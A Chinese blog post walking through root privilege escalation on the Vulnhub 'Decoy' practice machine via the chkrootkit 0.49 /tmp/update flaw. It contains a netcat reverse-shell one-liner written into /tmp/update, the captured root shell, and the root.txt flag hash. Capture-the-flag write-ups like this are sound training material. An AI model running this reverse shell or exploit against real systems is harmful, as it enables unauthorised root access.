Vulnhub之Decoy靶机-详细提权过程补充

Vulnhub Decoy提权补充

在拿到用户296640a3b825115a47b68fc44501c828的密码server后,为了方便观察现象,同时开启两个shell,并且需要指定-t "bash --noprofile"以逃避受限shell,登录成功后,要修改PATH环境变量,使其包含正常的环境变量:

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:/sbin

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat SV-502/logs/log.txt

在日志文件中看到有关chkrootkit的日志信息,chkrootkit是检查系统是否存在后门的工具。

在第1个目标主机shell中执行:

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
296640a+ 23309  0.0  0.0   6076   828 pts/1    S+   22:49   0:00 grep chk

从结果发现并没有运行chkrootkit的进程

在第2个shell中执行:

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy 
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5

The AV Scan will be launched in a minute or less.
--------------------------------------------------

执行第5选项,也就是病毒扫描,而这可能与chkrootkit相关,也就是一旦选择第5选项,可能就启动chkrootkit。

选择第5选项后,回到第1个shell查看进程:

但是仍然没有出现chkrootkit

此时参考exploitdb上关于0.49版本的漏洞利用方法,在/tmp创建文件名为update,此时内容随意并且赋予执行权限:

Steps to reproduce:

- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)

然后执行honeypot.decoy

此时回到第1个shell中查看进程(需要过一点时间)

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
296640a+   560  0.0  0.0   6076   884 pts/1    S+   22:59   0:00 grep chk
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
296640a+   562  0.0  0.0   6076   820 pts/1    S+   23:00   0:00 grep chk
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
root       571  2.0  0.1   2676  1936 ?        S    23:00   0:00 /bin/sh /root/chkrootkit-0.49/chkrootkit

发现PS输出结果中有chkrootkit进程,当然到目前为止我们创建的update文件里面的内容是没有意义的字符串,接下来就是修改update的内容,修改为反向shell命令:

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.230 5555 >/tmp/f' >/tmp/update
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ chmod 777 /tmp/update

然后再次执行./honeypot.decoy,选择选项5,也就是扫描病毒,

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy 
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5

The AV Scan will be launched in a minute or less.
--------------------------------------------------


┌──(kali㉿kali)-[~/Desktop/Vulnhub/Decoy]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.109] 48104
/bin/sh: 0: can't access tty; job control turned off
# cd /root
# ls -alh
total 3.1M
drwx------  4 root                             root                             4.0K Jul  7  2020 .
drwxr-xr-x 18 root                             root                             4.0K Jun 27  2020 ..
lrwxrwxrwx  1 root                             root                                9 Jul  7  2020 .bash_history -> /dev/null
-rw-r--r--  1 root                             root                              570 Jan 31  2010 .bashrc
drwxr-xr-x  2 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jul 30  2009 chkrootkit-0.49
-rw-r--r--  1 root                             root                              39K Apr  9  2015 chkrootkit-0.49.tar.gz
drwxr-xr-x  3 root                             root                             4.0K Jun 27  2020 .local
-rw-r--r--  1 root                             root                             7.7K Jun 27  2020 log.txt
-rw-r--r--  1 root                             root                              148 Aug 17  2015 .profile
-rwxr-xr-x  1 root                             root                             3.0M Aug 22  2019 pspy
-rw-r--r--  1 root                             root                              924 Jul  7  2020 root.txt
-rw-r--r--  1 root                             root                              137 Jul  7  2020 script.sh
-rw-r--r--  1 root                             root                               66 Jul  7  2020 .selected_editor
-rw-r--r--  1 root                             root                              208 Jun 27  2020 .wget-hsts
# cat root.txt
  ........::::::::::::..           .......|...............::::::::........
     .:::::;;;;;;;;;;;:::::.... .     \   | ../....::::;;;;:::::.......
         .       ...........   / \\_   \  |  /     ......  .     ........./\
...:::../\\_  ......     ..._/'   \\\_  \###/   /\_    .../ \_.......   _//
.::::./   \\\ _   .../\    /'      \\\\#######//   \/\   //   \_   ....////
    _/      \\\\   _/ \\\ /  x       \\\\###////      \////     \__  _/////
  ./   x       \\\/     \/ x X           \//////                   \/////
 /     XxX     \\/         XxX X                                    ////   x
-----XxX-------------|-------XxX-----------*--------|---*-----|------------X--
       X        _X      *    X      **         **             x   **    *  X
      _X                    _X           x                *          x     X_


1c203242ab4b4509233ca210d50d2cc5

Thanks for playing! - Felipe Winsnes (@whitecr0wz)
#
posted @ 2023-05-30 11:09  Jason_huawen  阅读(71)  评论(0编辑  收藏  举报